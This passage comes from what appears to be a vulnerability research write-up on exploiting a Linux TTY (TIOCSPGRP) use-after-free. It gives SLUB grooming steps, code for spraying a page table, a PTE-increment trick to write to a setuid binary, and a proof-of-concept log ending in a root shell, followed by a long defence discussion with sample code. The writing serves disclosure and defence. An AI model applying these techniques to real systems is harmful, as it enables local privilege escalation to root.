  3. Allocate around objs_per_slab * (1+cpu_partial) objects - in other words, a set of objects that completely fill at least cpu_partial pages, where cpu_partial is the maximum length of the "percpu partial list". Those newly allocated pages that are completely filled with objects are not referenced by SLUB's freelists at this point because SLUB only tracks pages with free objects on its freelists.
  4. Fill objs_per_slab-1 more objects, such that at the end of this step, the "CPU slab" (the page from which allocations will be served first) will not contain anything other than free space and fresh allocations (created in this step).
  5. Allocate the victim object (a struct pid). The victim page (the page from which the victim object came) will usually be the CPU slab from step 4, but if step 4 completely filled the CPU slab, the victim page might also be a new, freshly allocated CPU slab.
  6. Trigger the bug on the victim object to create an uncounted reference, and free the object.
  7. Allocate objs_per_slab+1 more objects. After this, the victim page will be completely filled with allocations from steps 4 and 7, and it won't be the CPU slab anymore (because the last allocation can not have fit into the victim page).
  8. Free all allocations from steps 4 and 7. This causes the victim page to become empty, but does not free the page; the victim page is placed on the percpu partial list once a single object from that page has been freed, and then stays on that list.
  9. Free one object per page from the allocations from step 3. This adds all these pages to the percpu partial list until it reaches the limit cpu_partial, at which point it will be flushed: Pages containing some in-use objects are placed on SLUB's per-NUMA-node partial list, and pages that are completely empty are freed back to the page allocator. (We don't free all allocations from step 3 because we only want the victim page to be freed to the page allocator.) Note that this step requires that every objs_per_slab-th object the allocator gave us in step 3 is on a different page.

When the page is given to the page allocator, we benefit from the page being order-0 (4 KiB, native page size): For order-0 pages, the page allocator has special freelists, one per CPU+zone+migratetype combination. Pages on these freelists are not normally accessed from other CPUs, and they don't immediately get combined with adjacent free pages to form higher-order free pages.

At this point we are able to perform use-after-free accesses to some offset inside the free victim page, using codepaths that interpret part of the victim page as a struct pid. Note that at this point, we still don't know exactly at which offset inside the victim page the victim object is located.

Attack stage: Reallocating the victim page as a pagetable

At the point where the victim page has reached the page allocator's freelist, it's essentially game over - at this point, the page can be reused as anything in the system, giving us a broad range of options for exploitation. In my opinion, most defences that act after we've reached this point are fairly unreliable.

One type of allocation that is directly served from the page allocator and has nice properties for exploitation are page tables (which have also been used to exploit Rowhammer). One way to abuse the ability to modify a page table would be to enable the read/write bit in a page table entry (PTE) that maps a file page to which we are only supposed to have read access - for example, this could be used to gain write access to part of a setuid binary's .text segment and overwrite it with malicious code.

We don't know at which offset inside the victim page the victim object is located; but since a page table is effectively an array of 8-byte-aligned elements of size 8 and the victim object's alignment is a multiple of that, as long as we spray all elements of the victim array, we don't need to know the victim object's offset.

To allocate a page table full of PTEs mapping the same file page, we have to:

  • prepare by setting up a 2MiB-aligned memory region (because each last-level page table describes 2MiB of virtual memory) containing single-page mmap() mappings of the same file page (meaning each mapping corresponds to one PTE); then
  • trigger allocation of the page table and fill it with PTEs by reading from each mapping (a minimal sketch of both steps follows).
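A minimal sketch of those two steps (not the PoC's code; the file path and helper name are illustrative):

#define _GNU_SOURCE
#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <sys/mman.h>

#define PT_SPAN (2UL << 20) /* virtual memory covered by one last-level page table */

static char *spray_pagetable(const char *path) {
    int fd = open(path, O_RDONLY);
    /* reserve twice the span so a 2MiB-aligned start can be chosen inside it */
    char *raw = mmap(NULL, 2 * PT_SPAN, PROT_NONE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    char *region = (char *)(((uintptr_t)raw + PT_SPAN - 1) & ~(PT_SPAN - 1));
    /* one single-page mapping of the same file page per future PTE */
    for (size_t off = 0; off < PT_SPAN; off += 0x1000)
        mmap(region + off, 0x1000, PROT_READ, MAP_PRIVATE | MAP_FIXED, fd, 0);
    /* fault each page in: this allocates the page table and fills its PTEs
     * (in the exploit, this is done once the victim page has been freed) */
    for (size_t off = 0; off < PT_SPAN; off += 0x1000)
        (void)*(volatile char *)(region + off);
    return region;
}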

struct pid has the same alignment as a PTE, and it starts with a 32-bit refcount, so that refcount is guaranteed to overlap the first half of a PTE, which is 64-bit. Because X86 CPUs are little-endian, incrementing the refcount field in the freed struct pid increments the least significant half of the PTE - so it effectively increments the PTE. (Except for the edge case where the least significant half is 0xffffffff, but that's not the case here.)

struct pid:  count | level |   tasks[0]  |   tasks[1]  |   tasks[2]  | ...
pagetable:        PTE      |     PTE     |     PTE     |     PTE     | ...

Therefore we can increment one of the PTEs by repeatedly triggering get_pid(), which tries to increment the refcount of the freed object. This can be turned into the ability to write to the file page as follows:

  • Increment the PTE by 0x42 to set the Read/Write bit and the Dirty bit. (If we didn't set the Dirty bit, the CPU would do it by itself when we write to the corresponding virtual address, so we could also just increment by 0x2 here.)
  • For each mapping, attempt to overwrite its contents with malicious data and ignore page faults.
    • This might throw spurious errors because of outdated TLB entries, but taking a page fault will automatically evict such TLB entries, so if we just attempt the write twice, this can't happen on the second write (modulo CPU migration, as mentioned above).
    • One easy way to ignore page faults is to let the kernel perform the memory write using pread(), which will return -EFAULT on fault, as sketched below.
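
As a rough illustration of that trick (a hypothetical helper, not taken from the exploit; it assumes the data to be written has been staged in a regular file beforehand):

#include <errno.h>
#include <sys/types.h>
#include <unistd.h>

/* Store `len` bytes at `dst` without risking SIGSEGV: pread() makes the
   kernel perform the memory write, and a fault surfaces as -EFAULT
   instead of a signal. Retry once to get past stale TLB entries. */
static int write_via_kernel(int staged_fd, void *dst, size_t len) {
  ssize_t res = pread(staged_fd, dst, len, 0);
  if (res < 0 && errno == EFAULT)
    res = pread(staged_fd, dst, len, 0);
  return (res == (ssize_t)len) ? 0 : -1;
}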

If the kernel notices the Dirty bit later on, that might trigger writeback, which could crash the kernel if the mapping isn't set up for writing. Therefore, we have to reset the Dirty bit. We can't reliably decrement the PTE because put_pid() inefficiently accesses pid->numbers[pid->level] even when the refcount isn't dropping to zero, but we can increment it by an additional 0x80-0x42=0x3e, which means the final value of the PTE, compared to the initial value, will just have the additional bit 0x80 set, which the kernel ignores.
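
To make the arithmetic concrete, here is a toy simulation of the two increments on a plausible starting PTE value; the flag constants are the x86-64 bit positions, but the starting flags and page frame number are assumptions for illustration:

#include <stdint.h>
#include <stdio.h>

#define PTE_PRESENT  0x001UL
#define PTE_RW       0x002UL
#define PTE_USER     0x004UL
#define PTE_ACCESSED 0x020UL
#define PTE_DIRTY    0x040UL
#define PTE_PAT      0x080UL /* ignored by the kernel's permission checks */

int main(void) {
  /* hypothetical PTE: some page frame number plus typical flags */
  uint64_t pte = 0x123456000UL | PTE_PRESENT | PTE_USER | PTE_ACCESSED;
  pte += 0x42; /* 0x42 refcount increments: sets RW and DIRTY (no carry) */
  printf("after +0x42: RW=%d DIRTY=%d\n", !!(pte & PTE_RW), !!(pte & PTE_DIRTY));
  pte += 0x3e; /* 0x42+0x3e=0x80: clears RW/DIRTY again, net effect is +PAT */
  printf("after +0x3e: RW=%d DIRTY=%d PAT=%d\n",
         !!(pte & PTE_RW), !!(pte & PTE_DIRTY), !!(pte & PTE_PAT));
  return 0;
}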

Afterwards, we launch the setuid executable (which, in the version in the pagecache, now contains the code we injected), and gain root privileges:

user@host:~/tiocspgrp$ make
as -o rootshell.o rootshell.S
ld -o rootshell rootshell.o --nmagic
gcc -Wall -o poc poc.c
user@host:~/tiocspgrp$ ./poc
starting up...
executing in first level child process, setting up session and PTY pair...
setting up unix sockets for ucreds spam...
draining pcpu and node partial pages
preparing for flushing pcpu partial pages
launching child process
child is 1448
ucreds spam done, struct pid refcount should be lifted. starting to skew refcount...
refcount should now be skewed, child exiting
child exited cleanly
waiting for RCU call...
bpf load with rlim 0x0: -1 (Operation not permitted)
bpf load with rlim 0x1000: 452 (Success)
bpf load success with rlim 0x1000: got fd 452
....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
RCU callbacks executed
gonna try to free the pid...
double-free child died with signal 9 after dropping 9990 references (99%)
hopefully reallocated as an L1 pagetable now
PTE forcibly marked WRITE | DIRTY (hopefully)
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
bash: cannot set terminal process group (1447): Inappropriate ioctl for device
bash: no job control in this shell
root@host:/home/user/tiocspgrp# id
uid=0(root) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),113(scanner),120(wireshark)
root@host:/home/user/tiocspgrp#

Note that nothing in this whole exploit requires us to leak any kernel-virtual or physical addresses, partly because we have an increment primitive instead of a plain write; and it also doesn't involve directly influencing the instruction pointer.

Defence

This section describes different ways in which this exploit could perhaps have been prevented from working. To assist the reader, the titles of some of the subsections refer back to specific exploit stages from the section above.

Against bugs being reachable: Attack surface reduction

A potential first line of defense against many kernel security issues is to only make kernel subsystems available to code that needs access to them. If an attacker does not have direct access to a vulnerable subsystem and doesn't have sufficient influence over a system component with access to make it trigger the issue, the issue is effectively unexploitable from the attacker's security context.

Pseudoterminals are (more or less) only necessary for interactively serving users who have shell access (or something resembling that), including:

  • terminal emulators inside graphical user sessions
  • SSH servers
  • screen sessions started from various types of terminals

Things like webservers or phone apps won't normally need access to such devices; but there are exceptions. For example:

  • a web server is used to provide a remote root shell for system administration
  • a phone app's purpose is to make a shell available to the user
  • a shell script uses expect to interact with a binary that requires a terminal for input/output

In my opinion, the biggest limits on attack surface reduction as a defensive strategy are:

  1. It exposes a workaround to an implementation concern of the kernel (potential memory safety issues) in user-facing API, which can lead to compatibility issues and maintenance overhead - for example, from a security standpoint, I think it might be a good idea to require phone apps and systemd services to declare their intention to use the PTY subsystem at install time, but that would be an API change requiring some sort of action from application authors, creating friction that wouldn't be necessary if we were confident that the kernel is working properly. This might get especially messy in the case of software that invokes external binaries depending on configuration, e.g. a web server that needs PTY access when it is used for server administration. (This is somewhat less complicated when a benign-but-potentially-exploitable application actively applies restrictions to itself; but not every application author is necessarily willing to design a fine-grained sandbox for their code, and even then, there may be compatibility issues caused by libraries outside the application author's control.)
  2. It can't protect a subsystem from a context that fundamentally needs access to it. (E.g. Android's /dev/binder is directly accessible by Chrome renderers on Android because they have Android code running inside them.)
  3. It means that decisions that ought not to influence the security of a system (making an API that does not grant extra privileges available to some potentially-untrusted context) essentially involve a security tradeoff.

Still, in practice, I believe that attack surface reduction mechanisms (especially seccomp) are currently some of the most important defense mechanisms on Linux.

Against bugs in source code: Compile-time locking validation

The bug in TIOCSPGRP was a fairly straightforward violation of a straightforward locking rule: While a tty_struct is live, accessing its pgrp member is forbidden unless the ctrl_lock of the same tty_struct is held. This rule is sufficiently simple that it wouldn't be entirely unreasonable to expect the compiler to be able to verify it - as long as you somehow inform the compiler about this rule, because figuring out the intended locking rules just from looking at a piece of code can often be hard even for humans (especially when some of the code is incorrect).

When you are starting a new project from scratch, the overall best way to approach this is to use a memory-safe language - in other words, a language that has explicitly been designed such that the programmer has to provide the compiler with enough information about intended memory safety semantics that the compiler can automatically verify them. But for existing codebases, it might be worth looking into how much of this can be retrofitted.

Clang's Thread Safety Analysis feature does something vaguely like what we'd need to verify the locking in this situation:

$ nl -ba -s' ' thread-safety-test.cpp | sed 's|^   ||'
1 struct __attribute__((capability("mutex"))) mutex {
2 };
3
4 void lock_mutex(struct mutex *p) __attribute__((acquire_capability(*p)));
5 void unlock_mutex(struct mutex *p) __attribute__((release_capability(*p)));
6
7 struct foo {
8     int a __attribute__((guarded_by(mutex)));
9     struct mutex mutex;
10 };
11
12 int good(struct foo *p1, struct foo *p2) {
13     lock_mutex(&p1->mutex);
14     int result = p1->a;
15     unlock_mutex(&p1->mutex);
16     return result;
17 }
18
19 int bogus(struct foo *p1, struct foo *p2) {
20     lock_mutex(&p1->mutex);
21     int result = p2->a;
22     unlock_mutex(&p1->mutex);
23     return result;
24 }
$ clang++ -c -o thread-safety-test.o thread-safety-test.cpp -Wall -Wthread-safety
thread-safety-test.cpp:21:22: warning: reading variable 'a' requires holding mutex 'p2->mutex' [-Wthread-safety-precise]
    int result = p2->a;
                     ^
thread-safety-test.cpp:21:22: note: found near match 'p1->mutex'
1 warning generated.
$

However, this does not currently work when compiling as C code because the guarded_by attribute can't find the other struct member; it seems to have been designed mostly for use in C++ code. A more fundamental problem is that it also doesn't appear to have built-in support for distinguishing the different rules for accessing a struct member depending on the lifetime state of the object. For example, almost all objects with locked members will have initialization/destruction functions that have exclusive access to the entire object and can access members without locking. (The lock might not even be initialized in those states.)

Some objects also have more lifetime states; in particular, for many objects with RCU-managed lifetime, only a subset of the members may be accessed through an RCU reference without having upgraded the reference to a refcounted one beforehand. Perhaps this could be addressed by introducing a new type attribute that can be used to mark pointers to structs in special lifetime states? (For C++ code, Clang's Thread Safety Analysis simply disables all checks in all constructor/destructor functions.)

I am hopeful that, with some extensions, something vaguely like Clang's Thread Safety Analysis could be used to retrofit some level of compile-time safety against unintended data races. This will require adding a lot of annotations, in particular to headers, to document intended locking semantics; but such annotations are probably anyway necessary to enable productive work on a complex codebase. In my experience, when there are no detailed comments/annotations on locking rules, every attempt to change a piece of code you're not intimately familiar with (without introducing horrible memory safety bugs) turns into a foray into the thicket of the surrounding call graphs, trying to unravel the intentions behind the code.

The one big downside is that this requires getting the development community for the codebase on board with the idea of backfilling and maintaining such annotations. And someone has to write the analysis tooling that can verify the annotations.

At the moment, the Linux kernel does have some very coarse locking validation via sparse; but this infrastructure is not capable of detecting situations where the wrong lock is used or validating that a struct member is protected by a lock. It also can't properly deal with things like conditional locking, which makes it hard to use for anything other than spinlocks/RCU. The kernel's runtime locking validation via LOCKDEP is more advanced, but mostly with a focus on locking correctness of RCU pointers as well as deadlock detection (the main focus); again, there is no mechanism to, for example, automatically validate that a given struct member is only accessed under a specific lock (which would probably also be quite costly to implement with runtime validation). Also, as a runtime validation mechanism, it can't discover errors in code that isn't executed during testing (although it can combine separately observed behavior into race scenarios without ever actually observing the race).

Against bugs in source code: Global static locking analysis

An alternative approach to checking memory safety rules at compile time is to do it either after the entire codebase has been compiled, or with an external tool that analyzes the entire codebase. This allows the analysis tooling to perform analysis across compilation units, reducing the amount of information that needs to be made explicit in headers. This may be a more viable approach if peppering annotations everywhere across headers isn't viable; but it also reduces the utility to human readers of the code, unless the inferred semantics are made visible to them through some special code viewer. It might also be less ergonomic in the long run if changes to one part of the kernel could make the verification of other parts fail - especially if those failures only show up in some configurations.

I think global static analysis is probably a good tool for finding some subsets of bugs, and it might also help with finding the worst-case depth of kernel stacks or proving the absence of deadlocks, but it's probably less suited for proving memory safety correctness?

Against exploit primitives: Attack primitive reduction via syscall restrictions

(Yes, I made up that name because I thought that capturing this under "Attack surface reduction" is too muddy.)

Because allocator fastpaths (both in SLUB and in the page allocator) are implemented using per-CPU data structures, the ease and reliability of exploits that want to coax the kernel's memory allocators into reallocating memory in specific ways can be improved if the attacker has fine-grained control over the assignment of exploit threads to CPU cores. I'm calling such a capability, which provides a way to facilitate exploitation by influencing relevant system state/behavior, an "attack primitive" here. Luckily for us, Linux allows tasks to pin themselves to specific CPU cores without requiring any privilege using the sched_setaffinity() syscall.
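
For illustration, here is all it takes for an unprivileged process to pin itself to CPU 0 (a minimal sketch):

#define _GNU_SOURCE
#include <err.h>
#include <sched.h>
#include <stdio.h>

int main(void) {
  cpu_set_t set;
  CPU_ZERO(&set);
  CPU_SET(0, &set);
  /* pid 0 = calling thread; no capability checks for one's own tasks */
  if (sched_setaffinity(0, sizeof(set), &set))
    err(1, "sched_setaffinity");
  printf("pinned to CPU 0: allocations/frees now hit CPU 0's per-CPU state\n");
  return 0;
}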

(As a different example, one primitive that can provide an attacker with fairly powerful capabilities is being able to indefinitely stall kernel faults on userspace addresses via FUSE or userfaultfd.)

Just like in the section "Attack surface reduction" above, an attacker's ability to use these primitives can be reduced by filtering syscalls; but while the mechanism and the compatibility concerns are similar, the rest is fairly different:

Attack primitive reduction does not normally reliably prevent a bug from being exploited; and an attacker will sometimes even be able to obtain a similar but shoddier (more complicated, less reliable, less generic, ...) primitive indirectly.

Attack surface reduction is about limiting access to code that is suspected to contain exploitable bugs; in a codebase written in a memory-unsafe language, that tends to apply to pretty much the entire codebase. Attack surface reduction is often fairly opportunistic: You permit the things you need, and deny the rest by default.

Attack primitive reduction limits access to code that is suspected or known to provide (sometimes very specific) exploitation primitives. For example, one might decide to specifically forbid access to FUSE and userfaultfd for most code because of their utility for kernel exploitation, and, if one of those interfaces is truly needed, design a workaround that avoids exposing the attack primitive to userspace. This is different from attack surface reduction, where it often makes sense to permit access to any feature that a legitimate workload wants to use.

A nice example of an attack primitive reduction is the sysctl vm.unprivileged_userfaultfd, which was first introduced so that userfaultfd can be made completely inaccessible to normal users and was then later adjusted so that users can be granted access to part of its functionality without gaining the dangerous attack primitive. (But if you can create unprivileged user namespaces, you can still use FUSE to get an equivalent effect.)
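
For example, an administrator can flip that knob at runtime (illustrative commands; on newer kernels, value 0 still permits unprivileged userfaultfd restricted to handling user-mode faults only):

# forbid (or restrict) unprivileged userfaultfd usage
sysctl -w vm.unprivileged_userfaultfd=0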

When maintaining lists of allowed syscalls for a sandboxed system component, or something along those lines, it may be a good idea to explicitly track which syscalls are explicitly forbidden for attack primitive reduction reasons, or similarly strong reasons - otherwise one might accidentally end up permitting them in the future. (I guess that's kind of similar to issues that one can run into when maintaining ACLs...)

But like in the previous section, attack primitive reduction also tends to rely on making some functionality unavailable, and so it might not be viable in all situations. For example, newer versions of Android deliberately indirectly give apps access to FUSE through the AppFuse mechanism. (That API doesn't actually give an app direct access to /dev/fuse, but it does forward read/write requests to the app.)

Against oops-based oracles: Lockout or panic on crash

The ability to recover from kernel oopses in an exploit can help an attacker compensate for a lack of information about system state. Under some circumstances, it can even serve as a binary oracle that can be used to more or less perform a binary search for a value, or something like that.

(It used to be even worse on some distributions, where dmesg was accessible for unprivileged users; so if you managed to trigger an oops or WARN, you could then grab the register states at all IRET frames in the kernel stack, which could be used to leak things like kernel pointers. Luckily nowadays most distributions, including Ubuntu 20.10, restrict dmesg access.)

Android and Chrome OS nowadays set the kernel's panic_on_oops flag, meaning the machine will immediately restart when a kernel oops happens. This makes it hard to use oopsing as part of an exploit, and arguably also makes more sense from a reliability standpoint - the system will be down for a bit, and it will lose its existing state, but it will also reset into a known-good state instead of continuing in a potentially half-broken state, especially if the crashing thread was holding mutexes that can never again be released, or things like that. On the other hand, if some service crashes on a desktop system, perhaps that shouldn't cause the whole system to immediately go down and make you lose unsaved state - so panic_on_oops might be too drastic there.
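
For reference, this policy is just a pair of sysctls, so a deployment that wants the Android/Chrome OS behavior could set something like (illustrative values):

sysctl -w kernel.panic_on_oops=1  # escalate any oops to a panic
sysctl -w kernel.panic=10         # reboot 10 seconds after a panic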

A good solution to this might require a more fine-grained approach. (For example, grsecurity has for a long time had the ability to lock out specific UIDs that have caused crashes.) Perhaps it would make sense to allow the init daemon to use different policies for crashes in different services/sessions/UIDs?

Against UAF access: Deterministic UAF mitigation

One defense that would reliably stop an exploit for this issue would be a deterministic use-after-free mitigation. Such a mitigation would reliably protect the memory formerly occupied by the object from accesses through dangling pointers to the object, at least once the memory has been reused for a different purpose (including reuse to store heap metadata). For write operations, this probably requires either atomicity of the access check and the actual write or an RCU-like delayed freeing mechanism. For simple read operations, it can also be implemented by ordering the access check after the read, but before the read value is used.

A big downside of this approach on its own is that extra checks on every memory access will probably come with an extremely high efficiency penalty, especially if the mitigation can not make any assumptions about what kinds of parallel accesses might be happening to an object, or what semantics pointers have. (The proof-of-concept implementation I presented at LSSNA 2020 (slides, recording) had CPU overhead roughly in the range 60%-159% in kernel-heavy benchmarks, and ~8% for a very userspace-heavy benchmark.)

Unfortunately, even a deterministic use-after-free mitigation often won't be enough to deterministically limit the blast radius of something like a refcounting mistake to the object in which it occurred. Consider a case where two codepaths concurrently operate on the same object: Codepath A assumes that the object is live and subject to normal locking rules. Codepath B knows that the reference count reached zero, assumes that it therefore has exclusive access to the object (meaning all members are mutable without any locking requirements), and is trying to tear down the object. Codepath B might then start dropping references the object was holding on other objects while codepath A is following the same references. This could then lead to use-after-frees on pointed-to objects. If all data structures are subject to the same mitigation, this might not be too much of a problem; but if some data structures (like struct page) are not protected, it might permit a mitigation bypass.

Similar issues apply to data structures with union members that are used in different object states; for example, here's some random kernel data structure with an rcu_head in a union (just a random example, there isn't anything wrong with this code as far as I know):

struct allowedips_node {
	struct wg_peer __rcu *peer;
	struct allowedips_node __rcu *bit[2];
	/* While it may seem scandalous that we waste space for v4,
	 * we're alloc'ing to the nearest power of 2 anyway, so this
	 * doesn't actually make a difference.
	 */
	u8 bits[16] __aligned(__alignof(u64));
	u8 cidr, bit_at_a, bit_at_b, bitlen;

	/* Keep rarely used list at bottom to be beyond cache line. */
	union {
		struct list_head peer_list;
		struct rcu_head rcu;
	};
};

As long as everything is working properly, the peer_list member is only used while the object is live, and the rcu member is only used after the object has been scheduled for delayed freeing; so this code is completely fine. But if a bug somehow caused the peer_list to be read after the rcu member has been initialized, type confusion would result.

In my opinion, this demonstrates that while UAF mitigations do have a lot of value (and would have reliably prevented exploitation of this specific bug), a use-after-free is just one possible consequence of the symptom class "object state confusion" (which may or may not be the same as the bug class of the root cause). It would be even better to enforce rules on object states, and ensure that an object e.g. can't be accessed through a "refcounted" reference anymore after the refcount has reached zero and has logically transitioned into a state like "non-RCU members are exclusively owned by thread performing teardown" or "RCU callback pending, non-RCU members are uninitialized" or "exclusive access to RCU-protected members granted to thread performing teardown, other members are uninitialized". Of course, doing this as a runtime mitigation would be even costlier and messier than a reliable UAF mitigation; this level of protection is probably only realistic with at least some level of annotations and static validation.

Against UAF access: Probabilistic UAF mitigation; pointer leaks

Summary: Some types of probabilistic UAF mitigation break if the attacker can leak information about pointer values; and information about pointer values easily leaks to userspace, e.g. through pointer comparisons in map/set-like structures.

If a deterministic UAF mitigation is too costly, an alternative is to do it probabilistically; for example, by tagging pointers with a small number of bits that are checked against object metadata on access, and then changing that object metadata when objects are freed.

The downside of this approach is that information leaks can be used to break the protection. One example of a type of information leak that I'd like to highlight (without any judgment on the relative importance of this compared to other types of information leaks) are intentional pointer comparisons, which have quite a few facets.

A relatively straightforward example where this could be an issue is the kcmp() syscall. This syscall compares two kernel objects using an arithmetic comparison of their permuted pointers (using a per-boot randomized permutation, see kptr_obfuscate()) and returns the result of the comparison (smaller, equal or greater). This gives userspace a way to order handles to kernel objects (e.g. file descriptors) based on the identities of those kernel objects (e.g. struct file instances), which in turn allows userspace to group a set of such handles by backing kernel object in O(n*log(n)) time using a standard sorting algorithm.

This syscall can be abused for improving the reliability of use-after-free exploits against some struct types because it checks whether two pointers to kernel objects are equal without accessing those objects: An attacker can allocate an object, somehow create a reference to the object that is not counted properly, free the object, reallocate it, and then verify whether the reallocation indeed reused the same address by comparing the dangling reference and a reference to the new object with kcmp(). If kcmp() includes the pointer's tag bits in the comparison, this would likely also permit breaking probabilistic UAF mitigations.
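
To illustrate the primitive itself, here is a benign, self-contained example; KCMP_FILE compares the struct file instances behind two file descriptors, returning 0 for equality and 1/2 for an (obfuscated) ordering:

#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/kcmp.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>

/* no glibc wrapper, so go through syscall() */
static long kcmp(pid_t pid1, pid_t pid2, int type,
                 unsigned long idx1, unsigned long idx2) {
  return syscall(SYS_kcmp, pid1, pid2, type, idx1, idx2);
}

int main(void) {
  int a = open("/dev/null", O_RDONLY);
  int b = dup(a);                      /* same struct file as a */
  int c = open("/dev/null", O_RDONLY); /* a different struct file */
  pid_t me = getpid();
  printf("a vs b: %ld\n", kcmp(me, me, KCMP_FILE, a, b)); /* 0 */
  printf("a vs c: %ld\n", kcmp(me, me, KCMP_FILE, a, c)); /* 1 or 2 */
  return 0;
}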

Essentially the same concern applies when a kernel pointer is encrypted and then given to userspace in fuse_lock_owner_id(), which encrypts the pointer to a files_struct with an open-coded version of XTEA before passing it to a FUSE daemon.

In both these cases, explicitly stripping tag bits would be an acceptable workaround because a pointer without tag bits still uniquely identifies a memory location; and given that these are very special interfaces that intentionally expose some degree of information about kernel pointers to userspace, it would be reasonable to adjust this code manually.

A somewhat more interesting example is the behavior of this piece of userspace code:

#define _GNU_SOURCE
#include <sys/epoll.h>
#include <sys/eventfd.h>
#include <sys/resource.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

int main(void) {
  struct rlimit rlim;
  SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim));
  rlim.rlim_cur = rlim.rlim_max;
  SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim));

  cpu_set_t cpuset;
  CPU_ZERO(&cpuset);
  CPU_SET(0, &cpuset);
  SYSCHK(sched_setaffinity(0, sizeof(cpuset), &cpuset));

  int epfd = SYSCHK(epoll_create1(0));
  for (int i=0; i<1000; i++)
    SYSCHK(eventfd(0, 0));
  for (int i=0; i<192; i++) {
    int fd = SYSCHK(eventfd(0, 0));
    struct epoll_event event = {
      .events = EPOLLIN,
      .data = { .u64 = i }
    };
    SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event));
  }

  char cmd[100];
  sprintf(cmd, "cat /proc/%d/fdinfo/%d", getpid(), epfd);
  system(cmd);
}

It first creates a ton of eventfds that aren't used. Then it creates a bunch more eventfds and creates epoll watches for them, in creation order, with a monotonically incrementing counter in the "data" field. Afterwards, it asks the kernel to print the current state of the epoll instance, which comes with a list of all registered epoll watches, including the value of the data member (in hex). But how is this list sorted? Here's the result of running that code in an Ubuntu 20.10 VM (truncated, because it's a bit long):

user@host:~/epoll_fdinfo$ ./epoll_fdinfo 
pos: 0
flags: 02
mnt_id: 14
tfd: 1040 events: 19 data: 24 pos:0 ino:2f9a sdev:d
tfd: 1050 events: 19 data: 2e pos:0 ino:2f9a sdev:d
tfd: 1024 events: 19 data: 14 pos:0 ino:2f9a sdev:d
tfd: 1029 events: 19 data: 19 pos:0 ino:2f9a sdev:d
tfd: 1048 events: 19 data: 2c pos:0 ino:2f9a sdev:d
tfd: 1042 events: 19 data: 26 pos:0 ino:2f9a sdev:d
tfd: 1026 events: 19 data: 16 pos:0 ino:2f9a sdev:d
tfd: 1033 events: 19 data: 1d pos:0 ino:2f9a sdev:d
[...]

The data: field here is the loop index we stored in the .data member, formatted as hex. Here is the complete list of the data values in decimal:

36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19, 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110, 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10, 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118, 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81, 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160, 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

While these look sort of random, you can see that the list can be split into blocks of length 32 that consist of shuffled contiguous sequences of numbers:

Block 1 (32 values in range 19-50):
36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19

Block 2 (32 values in range 83-114):
95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110

Block 3 (19 values in range 0-18):
12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10

Block 4 (32 values in range 115-146):
135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118

Block 5 (32 values in range 51-82):
66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81

Block 6 (32 values in range 147-178):
177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160

Block 7 (13 values in range 179-191):
186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

What's going on here becomes clear when you look at the data structures epoll uses internally. ep_insert calls ep_rbtree_insert to insert a struct epitem into a red-black tree (a type of sorted binary tree); and this red-black tree is sorted using a tuple of a struct file * and a file descriptor number:

/* Compare RB tree keys */
static inline int ep_cmp_ffd(struct epoll_filefd *p1,
                             struct epoll_filefd *p2)
{
	return (p1->file > p2->file ? +1:
	        (p1->file < p2->file ? -1 : p1->fd - p2->fd));
}

So the values we're seeing have been ordered based on the virtual address of the corresponding struct file; and SLUB allocates struct file from order-1 pages (i.e. pages of size 8 KiB), which can hold 32 objects each:

root@host:/sys/kernel/slab/filp# cat order 
1
root@host:/sys/kernel/slab/filp# cat objs_per_slab
32
root@host:/sys/kernel/slab/filp#

